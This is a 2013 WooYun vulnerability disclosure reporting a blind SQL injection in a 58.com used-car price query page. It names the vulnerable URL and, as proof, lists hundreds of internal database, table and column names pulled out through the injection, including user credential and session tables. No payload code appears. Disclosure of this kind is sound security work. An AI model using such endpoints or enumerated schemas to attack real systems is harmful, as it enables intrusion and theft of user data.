当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021890

漏洞标题:非你莫属专场58注射一枚(时间关系没深入)

相关厂商:58同城

漏洞作者: 工作专用

提交时间:2013-04-16 14:20

修复时间:2013-05-31 14:21

公开时间:2013-05-31 14:21

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-16: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-26: 细节向核心白帽子及相关领域专家公开
2013-05-06: 细节向普通白帽子公开
2013-05-16: 细节向实习白帽子公开
2013-05-31: 细节向公众公开

简要描述:

58同城的漏洞一个!非你莫属来的。后来有事就没仔细整 盲注耗时太长了。

详细说明:

盲注 非你莫属来的。后来有事就没仔细整 盲注耗时太长了。
表挺多。
后台也有。
http://hangqing.ershouche.58.com/queryhqChart.html?price=8.68&carlibid=269276&localid=1&madeyear=2008
地址。

2.png


3.png

漏洞证明:

DBWWW58COM_CompetitorAnalysis	Rival_Cate	ID
DBWWW58COM_CompetitorAnalysis	Rival_Cate	CateID
DBWWW58COM_CompetitorAnalysis	Rival_Cate	CityID
DBWWW58COM_CompetitorAnalysis	Rival_Cate	UrlByGanJiG
DBWWW58COM_CompetitorAnalysis	Rival_Cate	UrlByGanJiZ
DBWWW58COM_CompetitorAnalysis	Rival_Cate	UrlByBaiXingG
DBWWW58COM_CompetitorAnalysis	Rival_Cate	UrlByBaiXingZ
DBWWW58COM_CompetitorAnalysis	Rival_Cate	State
DBWWW58COM_CompetitorAnalysis	Rival_Cate	StartPageGanJi
DBWWW58COM_CompetitorAnalysis	Rival_Cate	StepGanJi
DBWWW58COM_CompetitorAnalysis	Rival_Cate	StartPageBaiXing
DBWWW58COM_CompetitorAnalysis	Rival_Cate	StepBaiXing
DBWWW58COM_CompetitorAnalysis	Rival_Count	ID
DBWWW58COM_CompetitorAnalysis	Rival_Count	CateID
DBWWW58COM_CompetitorAnalysis	Rival_Count	CityID
DBWWW58COM_CompetitorAnalysis	Rival_Count	Count58G
DBWWW58COM_CompetitorAnalysis	Rival_Count	Count58Z
DBWWW58COM_CompetitorAnalysis	Rival_Count	CountGanJiG
DBWWW58COM_CompetitorAnalysis	Rival_Count	CountGanJiZ
DBWWW58COM_CompetitorAnalysis	Rival_Count	CountBaiXingG
DBWWW58COM_CompetitorAnalysis	Rival_Count	CountBaiXingZ
DBWWW58COM_CompetitorAnalysis	Rival_Count	AddTime
DBWWW58COM_CompetitorAnalysis	Rival_Count	UpdateTime
DBWWW58COM_CompetitorAnalysis	Rival_Count	Count58GAddTime
DBWWW58COM_CompetitorAnalysis	Rival_Count	Count58ZAddTime
DBWWW58COM_CompetitorAnalysis	Rival_Count	SpiderCount
Datatool	downloadrecorder	id
Datatool	downloadrecorder	userid
Datatool	downloadrecorder	downloadatime
Datatool	downloadrecorder	fileName
Datatool	downloadrecorder	sessionid
Datatool	sqlrecorder	id
Datatool	sqlrecorder	userid
Datatool	sqlrecorder	sessionId
Datatool	sqlrecorder	email
Datatool	sqlrecorder	subtime
Datatool	sqlrecorder	exectime
Datatool	sqlrecorder	isexecute
Datatool	sqlrecorder	resultstate
Datatool	sqlrecorder	url
Datatool	sqlrecorder	sqlstr
Mail_Data	All_Site_Key_Data	datadate
Mail_Data	All_Site_Key_Data	AllSite_PV
Mail_Data	All_Site_Key_Data	AllSite_UV
Mail_Data	All_Site_Key_Data	Search_Use_Num
Mail_Data	All_Site_Key_Data	UserRegCount
Mail_Data	All_Site_Key_Data	UserMobileRegCount
Mail_Data	All_Site_Key_Data	InfoCount
Mail_Data	All_Site_Key_Data	Mobile_Au
Mail_Data	All_Site_Key_Data	Email_Au
Mail_Data	All_Site_Key_Data	Real_Au
Mail_Data	All_Site_Key_Data	Enterprise_Au
Mail_Data	CateConfig	cateid
Mail_Data	CateConfig	decisive_factors
Mail_Data	CateConfig	affect_factors
Mail_Data	CateConfig	other
Mail_Data	CateConfig	price
Mail_Data	Cate_Info_Count	datadate
Mail_Data	Cate_Info_Count	Cate_Name
Mail_Data	Cate_Info_Count	EffCount
Mail_Data	Cate_Info_Count	UserCount
Mail_Data	Cate_Info_Count	WAPCount
Mail_Data	Cate_Info_Count	CollCount
Mail_Data	Cate_Visit_Sta	datadate
Mail_Data	Cate_Visit_Sta	cate
Mail_Data	Cate_Visit_Sta	UV
Mail_Data	Cate_Visit_Sta	PV
Mail_Data	Cate_Visit_Sta	Stay_Avg
Mail_Data	Cate_Visit_Sta	Jump_In
Mail_Data	Cate_Visit_Sta	Jump_Out
Mail_Data	Cate_Visit_Sta	Bounce
Mail_Data	Cate_Visit_Sta	Stay
Mail_Data	Im_Sta	datadate
Mail_Data	Im_Sta	target_desc
Mail_Data	Im_Sta	target
Mail_Data	Im_Sta	target_value
Mail_Data	Search_Data	datadate
Mail_Data	Search_Data	search_num
Mail_Data	Search_Data	detail_see_num
Mail_Data	Search_Data	search_has_result
Mail_Data	Search_Data	search_see_detail
Mail_Data	Search_Data	search_jump
Mail_Data	Visit_Source_Data	datadate
Mail_Data	Visit_Source_Data	Ref
Mail_Data	Visit_Source_Data	UV
Mail_Data	Visit_Source_Data	PV
Mail_Data	Visit_Source_Data	Stay_Avg
Mail_Data	Visit_Source_Data	Jump_Out
Mail_Data	Visit_Source_Data	Bounce
Mail_Data	Visit_Source_Data	Stay
Mail_Data	dim_mail_cate	topcateid
Mail_Data	dim_mail_cate	mail_cate_desc
Mail_Data	dim_mail_cate	stat_DispCate_desc
Mail_Data	etl_log	datadate
Mail_Data	etl_log	table_name
Mail_Data	etl_log	flag
Mail_Data	etl_log	etl_start_time
Mail_Data	etl_log	etl_end_date
SDATA	Dim_Topcate	cate
SDATA	Dim_Topcate	catename
SDATA	Im_Dim	id
SDATA	Im_Dim	target_desc
SDATA	Im_Dim	target
SDATA	Sdata_Click_Weight_Change	datadate
SDATA	Sdata_Click_Weight_Change	change_time
SDATA	Sdata_Click_Weight_Change	infoid
SDATA	Sdata_Click_Weight_Change	phone
SDATA	Sdata_Click_Weight_Change	paixu
SDATA	Sdata_Click_Weight_Change	sortid
SDATA	Sdata_Click_Weight_Change	count
SDATA	Sdata_Click_Weight_Change	cateid
SDATA	Sdata_Click_Weight_Change	localid
SDATA	Sdata_Click_Weight_Change	isbiz
SDATA	Sdata_Messege	datadate
SDATA	Sdata_Messege	sendtime
SDATA	Sdata_Messege	bizcode
SDATA	Sdata_Messege	mobile
SDATA	Sdata_Messege	content
SDATA	Sdata_Messege	sendresult
SDATA	Sdata_Messege	myselfcode
SDATA	Sdata_Mo	datadate
SDATA	Sdata_Mo	number
SDATA	Sdata_Mo	content
SDATA	Sdata_Mo	recvtime
SDATA	Sdata_Mo	pushtime
SDATA	Sdata_Mo	command
SDATA	Sdata_U_StatAll	datadate
SDATA	Sdata_U_StatAll	AllCount
SDATA	Sdata_U_StatAll	UserCount
SDATA	Sdata_U_StatAll	CollCount
SDATA	Sdata_U_StatAll	WAPCount
SDATA	Sdata_U_StatAll	DelCount
SDATA	Sdata_U_StatAll	DelRate
SDATA	Sdata_U_StatAll	EffCount
SDATA	Sdata_U_StatAll	PicCount
SDATA	Sdata_U_StatAll	UserRegCount
SDATA	Sdata_U_StatAll	CommentCount
SDATA	Sdata_U_StatAll	VoteCount
SDATA	Sdata_U_StatAll	UserLogin
SDATA	Sdata_U_StatAll	MsgCount
SDATA	Sdata_U_StatAll	FriendCount
SDATA	Sdata_U_StatAll	AuditCount
SDATA	Sdata_U_StatAll	PartCount
SDATA	Sdata_U_StatAll	RefreshCount
SDATA	Sdata_U_StatAll	RepeatCount
SDATA	Sdata_U_StatAll	UserRegHisCount
SDATA	Sdata_U_StatAuthentication	datadate
SDATA	Sdata_U_StatAuthentication	MobileAll
SDATA	Sdata_U_StatAuthentication	MobliePass
SDATA	Sdata_U_StatAuthentication	EmailAll
SDATA	Sdata_U_StatAuthentication	EmailPass
SDATA	Sdata_U_StatAuthentication	RealAll
SDATA	Sdata_U_StatAuthentication	RealPass
SDATA	Sdata_U_StatAuthentication	RealNoPass
SDATA	Sdata_U_StatAuthentication	RealCannel
SDATA	Sdata_U_StatAuthentication	EnterpriseAll
SDATA	Sdata_U_StatAuthentication	EnterprisePass
SDATA	Sdata_U_StatAuthentication	EnterpriseNoPass
SDATA	Sdata_U_StatAuthentication	EnterpriseCannel
SDATA	Sdata_U_StatCateCity	datadate
SDATA	Sdata_U_StatCateCity	AllCount
SDATA	Sdata_U_StatCateCity	UserCount
SDATA	Sdata_U_StatCateCity	CollCount
SDATA	Sdata_U_StatCateCity	WAPCount
SDATA	Sdata_U_StatCateCity	DelCount
SDATA	Sdata_U_StatCateCity	DelRate
SDATA	Sdata_U_StatCateCity	EffCount
SDATA	Sdata_U_StatCateCity	PicCount
SDATA	Sdata_U_StatCateCity	CateID
SDATA	Sdata_U_StatCateCity	CityID
SDATA	Sdata_U_StatCateCity	PartCount
SDATA	Sdata_U_StatCateCity	RefreshCount
SDATA	Sdata_U_StatCateCity	RepeatCount
SDATA	Sdata_U_StatCateCity	ManualCheck
SDATA	Sdata_U_StatCateCity	AutomaticCheck
SDATA	Sdata_U_StatCateCity	AutomaticNoCheck
SDATA	Sdata_U_StatCateCity	RefreshAgentCount
SDATA	Sdata_U_StatCateCity	RefreshPersonalCount
SDATA	Sdata_U_StatNewUserInfo	datadate
SDATA	Sdata_U_StatNewUserInfo	InfoCount
SDATA	Sdata_U_StatNewUserInfo	NotInfoCount
SDATA	Sdata_U_StatNewUserInfo	OldUserLoginCount
SDATA	Sdata_U_StatNewUserInfo	OldUserInfoCount
SDATA	Sdata_U_StatUserReg	datadate
SDATA	Sdata_U_StatUserReg	RegCount
SDATA	Sdata_Weight_Change	datadate
SDATA	Sdata_Weight_Change	changetime
SDATA	Sdata_Weight_Change	change_type
SDATA	Sdata_Weight_Change	uid
SDATA	Sdata_Weight_Change	infoid
SDATA	Sdata_Weight_Change	infosource
SDATA	Sdata_Weight_Change	cateid
SDATA	Sdata_Weight_Change	time
SDATA	etl_log	datadate
SDATA	etl_log	table_name
SDATA	etl_log	flag
SDATA	etl_log	etl_start_time
SDATA	etl_log	etl_end_date
Watson	3chComplain	inforid
Watson	3chComplain	effect
Watson	3chComplain	cateid
Watson	3chComplain	compid
Watson	3chComplain	sourceid
Watson	3chComplain	infourl
Watson	3chComplain	user
Watson	3chComplain	inforcontext
Watson	3chComplain	remark
Watson	3chComplain	aimid
Watson	3chComplain	subtime
Watson	compaim	aimid
Watson	compaim	aimname
Watson	inforsource	sourceid
Watson	inforsource	sourcename
datamining	auth_group	id
datamining	auth_group	name
datamining	auth_group_permissions	id
datamining	auth_group_permissions	group_id
datamining	auth_group_permissions	permission_id
datamining	auth_message	id
datamining	auth_message	user_id
datamining	auth_message	message
datamining	auth_permission	id
datamining	auth_permission	name
datamining	auth_permission	content_type_id
datamining	auth_permission	codename
datamining	auth_user	id
datamining	auth_user	username
datamining	auth_user	first_name
datamining	auth_user	last_name
datamining	auth_user	email
datamining	auth_user	password
datamining	auth_user	is_staff
datamining	auth_user	is_active
datamining	auth_user	is_superuser
datamining	auth_user	last_login
datamining	auth_user	date_joined
datamining	auth_user_groups	id
datamining	auth_user_groups	user_id
datamining	auth_user_groups	group_id
datamining	auth_user_user_permissions	id
datamining	auth_user_user_permissions	user_id
datamining	auth_user_user_permissions	permission_id
datamining	django_admin_log	id
datamining	django_admin_log	action_time
datamining	django_admin_log	user_id
datamining	django_admin_log	content_type_id
datamining	django_admin_log	object_id
datamining	django_admin_log	object_repr
datamining	django_admin_log	action_flag
datamining	django_admin_log	change_message
datamining	django_content_type	id
datamining	django_content_type	name
datamining	django_content_type	app_label
datamining	django_content_type	model
datamining	django_session	session_key
datamining	django_session	session_data
datamining	django_session	expire_date
datamining	django_site	id
datamining	django_site	domain
datamining	django_site	name
datamining	fangchanprice_zz	id
datamining	fangchanprice_zz	xiaoquid
datamining	fangchanprice_zz	shi
datamining	fangchanprice_zz	isluxury
datamining	fangchanprice_zz	meanprice
datamining	fangchanprice_zz	minprice
datamining	fangchanprice_zz	maxprice
datamining	fangchanprice_zz	min_deleteprice
datamining	fangchanprice_zz	max_deleteprice
datamining	fangchanprice_zz	min_weightprice
datamining	fangchanprice_zz	max_weightprice
datamining	fangchanprice_zz	cateid
datamining	fangchanprice_zz	insertdate
datamining	fangchanrecommend_zz	id
datamining	fangchanrecommend_zz	xiaoquid
datamining	fangchanrecommend_zz	shi
datamining	fangchanrecommend_zz	isluxury
datamining	fangchanrecommend_zz	ting
datamining	fangchanrecommend_zz	wei
datamining	fangchanrecommend_zz	fitment
datamining	fangchanrecommend_zz	recommend_infoid
datamining	fangchanrecommend_zz	cateid
datamining	fangchanrecommend_zz	insertdate
datamining	param	id
datamining	param	paramKey
datamining	param	paramValue
datamining	param	lastModifyTime
datamining	priceResult	id
datamining	priceResult	cateid
datamining	priceResult	brand
datamining	priceResult	type
datamining	priceResult	meanPrice
datamining	priceResult	maxPrice
datamining	priceResult	minPrice
datamining	priceResult	startPrice
datamining	priceResult	endPrice
datamining	priceResult	weight
datamining	priceResult	freq
datamining	priceResult	seq
datamining	priceResult	quality
datamining	priceResult	lastModifyDate
datamining	priceResult	refPrice
datamining	priceResult	modifyUser
datamining	priceResult	status
datamining	refPrice	id
datamining	refPrice	brand
datamining	refPrice	type
datamining	refPrice	subtype
datamining	refPrice	price
datamining	refPrice	lastModifyDate
datamining	secInfo	infoId
datamining	secInfo	cateId
datamining	secInfo	brand
datamining	secInfo	type
datamining	secInfo	price
datamining	secInfo	refPrice
datamining	secInfo	quality
datamining	secInfo	isBiz
datamining	secInfo	params
datamining	secInfo	logDate
datamining	shoujiPrice	id
datamining	shoujiPrice	brand
datamining	shoujiPrice	brand_id
datamining	shoujiPrice	type
datamining	shoujiPrice	type_id
datamining	shoujiPrice	quality
datamining	shoujiPrice	ipone_cpu
datamining	shoujiPrice	ipone_version
datamining	shoujiPrice	meanPrice
datamining	shoujiPrice	varprice
datamining	shoujiPrice	maxPrice
datamining	shoujiPrice	minPrice
datamining	shoujiPrice	price
datamining	shoujiPrice	lastModifyDate
datamining	shoujiPrice	status
datamining	t_2s_computerprice	id
datamining	t_2s_computerprice	brand_id
datamining	t_2s_computerprice	series_id
datamining	t_2s_computerprice	quality_id
datamining	t_2s_computerprice	cpu_id
datamining	t_2s_computerprice	minprice
datamining	t_2s_computerprice	maxprice
datamining	t_2s_computerprice	price
datamining	t_2s_computerprice	modify_date
datamining	t_2s_computerprice	newPrice
datamining	t_2s_ipodprice	id
datamining	t_2s_ipodprice	brand_id
datamining	t_2s_ipodprice	model_id
datamining	t_2s_ipodprice	quality_id
datamining	t_2s_ipodprice	ipod_mem_id
datamining	t_2s_ipodprice	minprice
datamining	t_2s_ipodprice	maxprice
datamining	t_2s_ipodprice	price
datamining	t_2s_ipodprice	modify_date
datamining	t_2s_ipodprice	newPrice
datamining	t_2s_pbprice	id
datamining	t_2s_pbprice	brand_id
datamining	t_2s_pbprice	model_id
datamining	t_2s_pbprice	quality_id
datamining	t_2s_pbprice	ipad_mem_id
datamining	t_2s_pbprice	ipad_ver_id
datamining	t_2s_pbprice	ipad_wf_id
datamining	t_2s_pbprice	minprice
datamining	t_2s_pbprice	price
datamining	t_2s_pbprice	maxprice
datamining	t_2s_pbprice	modify_date
datamining	t_2s_pbprice	newPrice
datamining	t_2s_pbprice	fraudminprice
datamining	t_2s_pbprice	fraudmaxprice
datamining	t_2s_sjprice	id
datamining	t_2s_sjprice	brand_id
datamining	t_2s_sjprice	model_id
datamining	t_2s_sjprice	quality_id
datamining	t_2s_sjprice	iphone_mem_id
datamining	t_2s_sjprice	iphone_ver_id
datamining	t_2s_sjprice	minprice
datamining	t_2s_sjprice	maxprice
datamining	t_2s_sjprice	price
datamining	t_2s_sjprice	modify_date
datamining	t_2s_sjprice	newPrice
datamining	t_2s_sjprice	fraudminprice
datamining	t_2s_sjprice	fraudmaxprice
datamining	t_2s_sjprice_copy	id
datamining	t_2s_sjprice_copy	brand_id
datamining	t_2s_sjprice_copy	model_id
datamining	t_2s_sjprice_copy	quality_id
datamining	t_2s_sjprice_copy	iphone_mem_id
datamining	t_2s_sjprice_copy	iphone_ver_id
datamining	t_2s_sjprice_copy	minprice
datamining	t_2s_sjprice_copy	maxprice
datamining	t_2s_sjprice_copy	price
datamining	t_2s_sjprice_copy	modify_date
datamining	t_2s_sjprice_copy	newPrice
datamining	t_2s_sjprice_copy	fraudminprice
datamining	t_2s_sjprice_copy	fraudmaxprice
datamining	t_2s_xjprice	id
datamining	t_2s_xjprice	brand_id
datamining	t_2s_xjprice	model_id
datamining	t_2s_xjprice	quality_id
datamining	t_2s_xjprice	dfxj_id
datamining	t_2s_xjprice	minprice
datamining	t_2s_xjprice	maxprice
datamining	t_2s_xjprice	price
datamining	t_2s_xjprice	modify_date
datamining	t_2s_xjprice	newPrice
datamining	t_2s_yxjprice	id
datamining	t_2s_yxjprice	brand_id
datamining	t_2s_yxjprice	model_id
datamining	t_2s_yxjprice	quality_id
datamining	t_2s_yxjprice	yxj_ver_id
datamining	t_2s_yxjprice	minprice
datamining	t_2s_yxjprice	maxprice
datamining	t_2s_yxjprice	price
datamining	t_2s_yxjprice	modify_date
datamining	t_2s_yxjprice	newPrice
fangchan	fangchanprice_zz	id
fangchan	fangchanprice_zz	xiaoquid
fangchan	fangchanprice_zz	shi
fangchan	fangchanprice_zz	isluxury
fangchan	fangchanprice_zz	meanprice
fangchan	fangchanprice_zz	minprice
fangchan	fangchanprice_zz	maxprice
fangchan	fangchanprice_zz	min_deleteprice
fangchan	fangchanprice_zz	max_deleteprice
fangchan	fangchanprice_zz	min_weightprice
fangchan	fangchanprice_zz	max_weightprice
fangchan	fangchanprice_zz	cateid
fangchan	fangchanprice_zz	insertdate
fangchan	fangchanrecommend_zz	id
fangchan	fangchanrecommend_zz	xiaoquid
fangchan	fangchanrecommend_zz	shi
fangchan	fangchanrecommend_zz	isluxury
fangchan	fangchanrecommend_zz	ting
fangchan	fangchanrecommend_zz	wei
fangchan	fangchanrecommend_zz	fitment
fangchan	fangchanrecommend_zz	recommend_infoid
fangchan	fangchanrecommend_zz	cateid
fangchan	fangchanrecommend_zz	insertdate
hbaseMailData	ClickResult	datadate
hbaseMailData	ClickResult	cate
hbaseMailData	ClickResult	city
hbaseMailData	ClickResult	pv
hbaseMailData	ClickResult	uv
hbaseMailData	ClickResult	visitor
hbaseMailData	ClickResult	jumpin
hbaseMailData	ClickResult	jumpout
hbaseMailData	DetailLogCount	time
hbaseMailData	DetailLogCount	cate
hbaseMailData	DetailLogCount	area
hbaseMailData	DetailLogCount	souOutPv
hbaseMailData	DetailLogCount	detailUv
hbaseMailData	DetailLogCount	vistsCount
hbaseMailData	DetailLogCount	souToPv
hbaseMailData	DetailLogCount	listToPv
hbaseMailData	DetailLogCount	detailPv
hbaseMailData	InfoResult	datadate
hbaseMailData	InfoResult	cate
hbaseMailData	InfoResult	city
hbaseMailData	InfoResult	uidCountAgent
hbaseMailData	InfoResult	uidCount
hbaseMailData	InfoResult	uidCountPerson
hbaseMailData	InfoResult	allIsBiz
hbaseMailData	InfoResult	wapInfoAgentCount
hbaseMailData	InfoResult	refreshInfoAgentCount
hbaseMailData	InfoResult	checkPassCount
hbaseMailData	InfoResult	crawlInfoAgentCount
hbaseMailData	InfoResult	checkPassAgentCount
hbaseMailData	InfoResult	checkPassPersonCount
hbaseMailData	InfoResult	wapInfoCount
hbaseMailData	InfoResult	allCount
hbaseMailData	InfoResult	checkManualCount
hbaseMailData	InfoResult	checkAutoPassCount
hbaseMailData	InfoResult	newInfoCount
hbaseMailData	InfoResult	newInfoPersonCount
hbaseMailData	InfoResult	updateInfoAgentCount
hbaseMailData	InfoResult	delInfoCount
hbaseMailData	InfoResult	wapInfoPersonCount
hbaseMailData	InfoResult	updateInfoCount
hbaseMailData	InfoResult	checkAutoNotPassCount
hbaseMailData	InfoResult	delInfoAgentCount
hbaseMailData	InfoResult	crawlInfoPersonCount
hbaseMailData	InfoResult	crawlInfoCount
hbaseMailData	InfoResult	newInfoAgentCount
hbaseMailData	InfoResult	updateInfoPersonCount
hbaseMailData	InfoResult	refreshInfoCount
hbaseMailData	InfoResult	refreshInfoPersonCount
hbaseMailData	InfoResult	allIsPerson
hbaseMailData	InfoResult	delInfoPersonCount
hbaseMailData	ListAnalytics	datadate
hbaseMailData	ListAnalytics	actionCate
hbaseMailData	ListAnalytics	actionArea
hbaseMailData	ListAnalytics	actionToDetailUv
hbaseMailData	ListAnalytics	actionVisit
hbaseMailData	ListAnalytics	actionPv
hbaseMailData	ListAnalytics	actionBounce
hbaseMailData	ListAnalytics	actionOneToDetailPV
hbaseMailData	ListAnalytics	actionVisitResult
hbaseMailData	ListAnalytics	actionLand
hbaseMailData	ListAnalytics	actionNoResult
hbaseMailData	ListAnalytics	actionUv
hbaseMailData	ListAnalytics	actionOnePv
hbaseMailData	ListAnalytics	actionMoreResult
hbaseMailData	ListAnalytics	actionType
hbaseMailData	ListAnalytics	actionToDetailPv
hbaseMailData	ListAnalytics	actionExit
price	CateConfig	cateid
price	CateConfig	decisive_factors
price	CateConfig	affect_factors
price	CateConfig	other
price	CateConfig	price
price	FilterConfig	id
price	FilterConfig	cateid
price	FilterConfig	param1
price	FilterConfig	min_value1
price	FilterConfig	max_value1
price	FilterConfig	param2
price	FilterConfig	value2
price	FilterConfig	param3
price	FilterConfig	value3
price	FilterConfig	min_price
price	FilterConfig	max_price
price	ModelConfig	id
price	ModelConfig	cateid
price	ModelConfig	dividenum
price	ModelConfig	gotnum
price	ModelConfig	restorefactor
price	ModelConfig	recrate
price	fangchanprice_zz	id
price	fangchanprice_zz	xiaoquid
price	fangchanprice_zz	shi
price	fangchanprice_zz	isluxury
price	fangchanprice_zz	meanprice
price	fangchanprice_zz	minprice
price	fangchanprice_zz	maxprice
price	fangchanprice_zz	min_deleteprice
price	fangchanprice_zz	max_deleteprice
price	fangchanprice_zz	min_weightprice
price	fangchanprice_zz	max_weightprice
price	fangchanprice_zz	cateid
price	fangchanprice_zz	insertdate
price	jobparams	ID
price	jobparams	CateID
price	jobparams	ParamValue
price	jobparams	AddTime
price	jobsalary	ID
price	jobsalary	CateID
price	jobsalary	DispJobID
price	jobsalary	CityID
price	jobsalary	SalaryDown
price	jobsalary	SalaryUp
price	jobsalary	AddTime
price	t_2s_computerprice	id
price	t_2s_computerprice	brand_id
price	t_2s_computerprice	series_id
price	t_2s_computerprice	quality_id
price	t_2s_computerprice	cpu_id
price	t_2s_computerprice	minprice
price	t_2s_computerprice	maxprice
price	t_2s_computerprice	price
price	t_2s_computerprice	modify_date
price	t_2s_computerprice	newPrice
price	t_2s_ipodprice	id
price	t_2s_ipodprice	brand_id
price	t_2s_ipodprice	model_id
price	t_2s_ipodprice	quality_id
price	t_2s_ipodprice	ipod_mem_id
price	t_2s_ipodprice	minprice
price	t_2s_ipodprice	maxprice
price	t_2s_ipodprice	price
price	t_2s_ipodprice	modify_date
price	t_2s_ipodprice	newPrice
price	t_2s_pbprice	id
price	t_2s_pbprice	brand_id
price	t_2s_pbprice	model_id
price	t_2s_pbprice	quality_id
price	t_2s_pbprice	ipad_mem_id
price	t_2s_pbprice	ipad_ver_id
price	t_2s_pbprice	ipad_wf_id
price	t_2s_pbprice	minprice
price	t_2s_pbprice	price
price	t_2s_pbprice	maxprice
price	t_2s_pbprice	modify_date
price	t_2s_pbprice	newPrice
price	t_2s_pbprice	fraudminprice
price	t_2s_pbprice	fraudmaxprice
price	t_2s_sjprice	id
price	t_2s_sjprice	brand_id
price	t_2s_sjprice	model_id
price	t_2s_sjprice	quality_id
price	t_2s_sjprice	iphone_mem_id
price	t_2s_sjprice	iphone_ver_id
price	t_2s_sjprice	minprice
price	t_2s_sjprice	maxprice
price	t_2s_sjprice	price
price	t_2s_sjprice	modify_date
price	t_2s_sjprice	newPrice
price	t_2s_sjprice	fraudminprice
price	t_2s_sjprice	fraudmaxprice
price	t_2s_xjprice	id
price	t_2s_xjprice	brand_id
price	t_2s_xjprice	model_id
price	t_2s_xjprice	quality_id
price	t_2s_xjprice	dfxj_id
price	t_2s_xjprice	minprice
price	t_2s_xjprice	maxprice
price	t_2s_xjprice	price
price	t_2s_xjprice	modify_date
price	t_2s_xjprice	newPrice
price	t_2s_yxjprice	id
price	t_2s_yxjprice	brand_id
price	t_2s_yxjprice	model_id
price	t_2s_yxjprice	quality_id
price	t_2s_yxjprice	yxj_ver_id
price	t_2s_yxjprice	minprice
price	t_2s_yxjprice	maxprice
price	t_2s_yxjprice	price
price	t_2s_yxjprice	modify_date
price	t_2s_yxjprice	newPrice
price	t_carlib	CarLibID
price	t_carlib	ParentID
price	t_carlib	Title
price	t_carlib	Description
price	t_carlib	DispCateID
price	t_carlib	ListName
price	t_carlib	SortID
price	t_carlib	IsVisible
price	t_carlib	Type
price	t_carlib	ExtendID
price	t_carlib	ExtendValue
price	t_carlib	FullPath
price	t_carlib	Depth
price	t_carlib	Pic
price	t_carlib	CarLevelID
price	t_carlib	SellStatus
price	t_carlib	ProductionStatus
price	t_carlib	Status
price	t_carlib	MinPrice
price	t_carlib	MaxPrice
price	t_carlib	GearBox
price	t_carlib	Displacement
price	t_carlib	MadeIn
price	t_carlibcmcs	Carlibid
price	t_carlibcmcs	CmcsCarlibid
price	t_hangqing	ID
price	t_hangqing	FactoryID
price	t_hangqing	BrandID
price	t_hangqing	SeriesID
price	t_hangqing	ModelID
price	t_hangqing	MadeYear
price	t_hangqing	MinPrice
price	t_hangqing	MaxPrice
price	t_hangqing	CreateYear
price	t_hangqing	CreateMonth
price	t_hangqing	CreateTime
price	t_hangqing	LevelID
price	t_hangqing	LocalID
price	t_hangqing	NewMinPrice
price	t_hangqing	NewMaxPrice
price	t_hangqing	GuidePrice
price	t_hangqing	Displacement
price	t_hangqing_allcity	ID
price	t_hangqing_allcity	FactoryID
price	t_hangqing_allcity	BrandID
price	t_hangqing_allcity	SeriesID
price	t_hangqing_allcity	ModelID
price	t_hangqing_allcity	MadeYear
price	t_hangqing_allcity	MinPrice
price	t_hangqing_allcity	MaxPrice
price	t_hangqing_allcity	CreateYear
price	t_hangqing_allcity	CreateMonth
price	t_hangqing_allcity	CreateTime
price	t_hangqing_allcity	LevelID
price	t_hangqing_allcity	LocalID
price	t_hangqing_allcity	NewMinPrice
price	t_hangqing_allcity	NewMaxPrice
price	t_hangqing_allcity	GuidePrice
price	t_hangqing_allcity	Displacement
price	t_hangqing_allcity_carage	ID
price	t_hangqing_allcity_carage	FactoryID
price	t_hangqing_allcity_carage	BrandID
price	t_hangqing_allcity_carage	SeriesID
price	t_hangqing_allcity_carage	ModelID
price	t_hangqing_allcity_carage	MadeYear
price	t_hangqing_allcity_carage	MinPrice
price	t_hangqing_allcity_carage	MaxPrice
price	t_hangqing_allcity_carage	CreateYear
price	t_hangqing_allcity_carage	CreateMonth
price	t_hangqing_allcity_carage	CreateTime
price	t_hangqing_allcity_carage	LevelID
price	t_hangqing_allcity_carage	LocalID
price	t_hangqing_allcity_carage	NewMinPrice
price	t_hangqing_allcity_carage	NewMaxPrice
price	t_hangqing_allcity_carage	GuidePrice
price	t_hangqing_allcity_carage	Displacement
price	t_hangqing_carage	ID
price	t_hangqing_carage	FactoryID
price	t_hangqing_carage	BrandID
price	t_hangqing_carage	SeriesID
price	t_hangqing_carage	ModelID
price	t_hangqing_carage	MadeYear
price	t_hangqing_carage	MinPrice
price	t_hangqing_carage	MaxPrice
price	t_hangqing_carage	CreateYear
price	t_hangqing_carage	CreateMonth
price	t_hangqing_carage	CreateTime
price	t_hangqing_carage	LevelID
price	t_hangqing_carage	LocalID
price	t_hangqing_carage	NewMinPrice
price	t_hangqing_carage	NewMaxPrice
price	t_hangqing_carage	GuidePrice
price	t_hangqing_carage	Displacement
price	t_petprice	breedId
price	t_petprice	breedName
price	t_petprice	price
price	t_petprice	insertdate
priceAudit	fangchanprice_zz_audit	id
priceAudit	fangchanprice_zz_audit	xiaoquid
priceAudit	fangchanprice_zz_audit	shi
priceAudit	fangchanprice_zz_audit	isluxury
priceAudit	fangchanprice_zz_audit	meanprice
priceAudit	fangchanprice_zz_audit	minprice
priceAudit	fangchanprice_zz_audit	maxprice
priceAudit	fangchanprice_zz_audit	min_weightprice
priceAudit	fangchanprice_zz_audit	max_weightprice
priceAudit	fangchanprice_zz_audit	cateid
priceAudit	fangchanprice_zz_audit	insertdate
priceAudit	fangchanprice_zz_audit	state
priceAudit	t_2s_computerprice_audit	id
priceAudit	t_2s_computerprice_audit	brand_id
priceAudit	t_2s_computerprice_audit	series_id
priceAudit	t_2s_computerprice_audit	quality_id
priceAudit	t_2s_computerprice_audit	cpu_id
priceAudit	t_2s_computerprice_audit	minprice
priceAudit	t_2s_computerprice_audit	maxprice
priceAudit	t_2s_computerprice_audit	price
priceAudit	t_2s_computerprice_audit	modify_date
priceAudit	t_2s_computerprice_audit	newPrice
priceAudit	t_2s_computerprice_audit	state
priceAudit	t_2s_ipodprice_audit	id
priceAudit	t_2s_ipodprice_audit	brand_id
priceAudit	t_2s_ipodprice_audit	model_id
priceAudit	t_2s_ipodprice_audit	quality_id
priceAudit	t_2s_ipodprice_audit	ipod_mem_id
priceAudit	t_2s_ipodprice_audit	minprice
priceAudit	t_2s_ipodprice_audit	maxprice
priceAudit	t_2s_ipodprice_audit	price
priceAudit	t_2s_ipodprice_audit	modify_date
priceAudit	t_2s_ipodprice_audit	newPrice
